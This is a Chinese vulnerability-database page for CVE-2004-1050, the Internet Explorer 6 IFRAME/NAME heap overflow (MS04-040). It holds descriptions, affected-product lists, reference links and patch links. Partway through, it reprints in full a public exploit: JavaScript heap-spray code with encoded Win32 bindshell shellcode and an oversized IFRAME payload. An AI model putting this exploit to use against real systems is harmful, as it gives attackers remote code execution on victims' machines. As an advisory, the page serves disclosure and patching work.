CVE-2004-1050
CVSS10.0
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:50:58
NMCOES    

[原文]Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME, FRAME, and EMBED elements, as originally discovered using the mangleme utility, aka "the IFRAME vulnerability" or the "HTML Elements Vulnerability."


[CNNVD]Microsoft Windows IE IFRAME缓冲区溢出漏洞(MS04-040)(CNNVD-200412-657)

        
        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer在处理IFRAME标签的NAME属性时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以IE进程权限在系统上执行任意指令。
        攻击者如果构建一个IFRAME标签,并在NAME属性中构建超长字符串,诱使用户访问此页面,可导致目标用户IE程序发生缓冲区溢出,精心构建页面数据,可能以IE进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:avaya:ip600_media_servers:r7
cpe:/a:avaya:ip600_media_servers:r9
cpe:/a:avaya:ip600_media_servers:r6
cpe:/a:avaya:ip600_media_servers:r8
cpe:/h:avaya:s8100:r6
cpe:/h:avaya:s8100:r9
cpe:/h:avaya:s3400Avaya S3400
cpe:/h:avaya:s8100:r7
cpe:/h:avaya:s8100Avaya S8100
cpe:/a:avaya:ip600_media_serversAvaya IP600 Media Servers
cpe:/h:avaya:definity_one_media_server:r12
cpe:/o:avaya:modular_messaging_message_storage_server:s3400
cpe:/h:avaya:definity_one_media_server:r11
cpe:/h:avaya:definity_one_media_server:r10Avaya DefinityOne Media Servers R10
cpe:/a:avaya:ip600_media_servers:r11
cpe:/h:avaya:s8100:r10
cpe:/a:avaya:ip600_media_servers:r12
cpe:/h:avaya:s8100:r12
cpe:/h:avaya:s8100:r11
cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0
cpe:/a:avaya:ip600_media_servers:r10Avaya IP600 Media Servers R10
cpe:/h:avaya:s8100:r8
cpe:/h:avaya:definity_one_media_server:r8
cpe:/a:microsoft:ie:6.0:sp1
cpe:/h:avaya:definity_one_media_serverAvaya DefinityOne Media Server
cpe:/h:avaya:definity_one_media_server:r6
cpe:/h:avaya:definity_one_media_server:r9Avaya DefinityOne Media Servers R9
cpe:/h:avaya:definity_one_media_server:r7

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1294IFRAME Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1050
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1050
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-657
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/028009.html
(UNKNOWN)  FULLDISC  20041023 python does mangleme (with IE bugs!)
http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/028035.html
(UNKNOWN)  FULLDISC  20041025 python does mangleme (with IE bugs!)
http://marc.info/?l=bugtraq&m=109942758911846&w=2
(UNKNOWN)  BUGTRAQ  20041102 MSIE <IFRAME> and <FRAME> tag NAME property bufferoverflow PoC
http://www.kb.cert.org/vuls/id/842160
(VENDOR_ADVISORY)  CERT-VN  VU#842160
http://www.microsoft.com/technet/security/Bulletin/MS04-040.mspx
(UNKNOWN)  MS  MS04-040
http://www.securityfocus.com/archive/1/379261
(UNKNOWN)  BUGTRAQ  20041024 python does mangleme (with IE bugs!)
http://www.securityfocus.com/bid/11515
(UNKNOWN)  BID  11515
http://www.us-cert.gov/cas/techalerts/TA04-315A.html
(UNKNOWN)  CERT  TA04-315A
http://www.us-cert.gov/cas/techalerts/TA04-336A.html
(UNKNOWN)  CERT  TA04-336A
http://xforce.iss.net/xforce/xfdb/17889
(VENDOR_ADVISORY)  XF  ie-iframe-src-name-bo(17889)

- 漏洞信息

Microsoft Windows IE IFRAME缓冲区溢出漏洞(MS04-040)
危急 边界条件错误
2004-12-31 00:00:00 2005-12-12 00:00:00
远程  
        
        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer在处理IFRAME标签的NAME属性时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以IE进程权限在系统上执行任意指令。
        攻击者如果构建一个IFRAME标签,并在NAME属性中构建超长字符串,诱使用户访问此页面,可导致目标用户IE程序发生缓冲区溢出,精心构建页面数据,可能以IE进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS04-040)以及相应补丁:
        MS04-040:Cumulative Security Update for Internet Explorer (889293)
        链接:
        http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx

        补丁下载:
        * IE6 SP1 for Windows XP, Windows 2000
        
        http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=3a9dbd51-4348-4ee6-9bc1-d9a1e12963ec

        * IE6 SP1 for Windows 98, Windows Millennium, Windows NT4
        
        http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyId=96DE6C13-4F67-4581-8F51-2C8A90E11C57

        * IE6 6 for Windows XP Service Pack 1 (64位版本)
        
        http://www.microsoft.com/downloads/details.aspx?familyid=1e9105cf-eb5b-4af5-b73d-03e8969e0b5c

- 漏洞信息 (612)

MS Internet Explorer (IFRAME Tag) Buffer Overflow Exploit (EDBID:612)
windows remote
2004-11-02 Verified
0 SkyLined
N/A [点击下载]
<HTML><!--
________________________________________________________________________________

    ,sSSSs,   Ss,       Internet Exploiter v0.1
   SS"  `YS'   '*Ss.    MSIE <IFRAME src=... name="..."> BoF PoC exploit
  iS'            ,SS"   Copyright (C) 2003, 2004 by Berend-Jan Wever.
  YS,  .ss    ,sY"      http://www.edup.tudelft.nl/~bjwever
  `"YSSP"   sSS         <skylined@edup.tudelft.nl>
________________________________________________________________________________

  This program is free software; you can redistribute it and/or modify it under
  the terms of the GNU General Public License version 2, 1991 as published by
  the Free Software Foundation.

  This program is distributed in the hope that it will be useful, but WITHOUT
  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
  details.

  A copy of the GNU General Public License can be found at:
    http://www.gnu.org/licenses/gpl.html
  or you can write to:
    Free Software Foundation, Inc.
    59 Temple Place - Suite 330
    Boston, MA  02111-1307
    USA.
-->

  <SCRIPT language="javascript">
    // Win32 MSIE exploit helper script, creates a lot of nopslides to land in
    // and/or use as return address. Thanks to blazde for feedback and idears.

    // Win32 bindshell (port 28876, '\0' free, looping). Thanks to HDM and
    // others for inspiration and borrowed code.
    shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
    // Nopslide will contain these bytes:
    bigblock = unescape("%u0D0D%u0D0D");
    // Heap blocks in IE have 20 dwords as header
    headersize = 20;
    // This is all very 1337 code to create a nopslide that will fit exactly
    // between the the header and the shellcode in the heap blocks we want.
    // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
    // documentation for this.
    slackspace = headersize+shellcode.length
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    // And now we can create the heap blocks, we'll create 700 of them to spray
    // enough memory to be sure enough that we've got one at 0x0D0D0D0D
    memory = new Array();
    for (i=0;i<700;i++) memory[i] = block + shellcode;
  </SCRIPT>
  <!--
    The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
    7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
    [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
    7178EC04                      68 847B7071     PUSH    71707B84
    7178EC09                      50              PUSH    EAX
    7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
    Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
    We land inside one of the nopslides and slide on down to the shellcode.
  -->
  <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC&#3341;&#3341;"></IFRAME>
</HTML>


// milw0rm.com [2004-11-02]
		

- 漏洞信息

11337
Microsoft IE FRAME/IFRAME/EMBED Tag Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

A local overflow exists in Internet Explorer. The Shell Doc Object and Control Library, or SHDOCVW.DLL, fails to validate the NAME property within the FRAME, IFRAME, and EMBED tags, resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-10-25 Unknow
2004-11-01 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Internet Explorer Malformed IFRAME Remote Buffer Overflow Vulnerability
Boundary Condition Error 11515
Yes No
2004-10-24 12:00:00 2009-07-12 08:06:00
This issue was reported by ned <nd@felinemenace.org> and Berend-Jan Wever <skylined@edup.tudelft.nl>.

- 受影响的程序版本

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya Modular Messaging S3400
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers
Microsoft Internet Explorer 6.0 SP2 - do not use

- 不受影响的程序版本

Microsoft Internet Explorer 6.0 SP2 - do not use

- 漏洞讨论

Microsoft Internet Explorer is reported prone to a remote buffer overflow vulnerability. This issue presents itself due to insufficient boundary checks performed by the application and results in arbitrary code execution or a denial of service.

This issue does not affect the following Internet Explorer 6 versions:
- Internet Explorer 6 for Windows Server 2003
- Internet Explorer 6 for Windows Server 2003 64-Bit Edition and Windows XP 64-Bit Edition Version 2003
- Internet Explorer 6 for Windows XP Service Pack 2

- 漏洞利用

A proof of concept is available from the following location:

http://felinemenace.org/~nd/crash_ie/2446.html

CORE has developed a working commercial exploit for their IMPACT
product. This exploit is not otherwise publicly available or known
to be circulating in the wild.

An additional exploit has been made available by Berend-Jan Wever; the integrity of this exploit has not been verified by Symantec:

- 解决方案

Avaya has released an advisory that acknowledges this vulnerability for Avaya products. Avaya advise that customers follow the Microsoft recommendations to address this issue. Please see the referenced Avaya advisory at the following location for further details:
http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=212001&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()

Microsoft Internet Explorer 6 Service Pack 2 is not prone to this vulnerability. If applicable, customers are advised to apply this service pack in order to mitigate the risk of exposure.

Microsoft has released a security bulletin that provides fixes for this issue on supported versions of the operating system. This bulletin also includes update rollup 889669 fixes for corporate users or users that have received hotfixes for Internet Explorer 6 SP1 after the release of bulletin MS04-004.


Microsoft Internet Explorer 6.0 SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站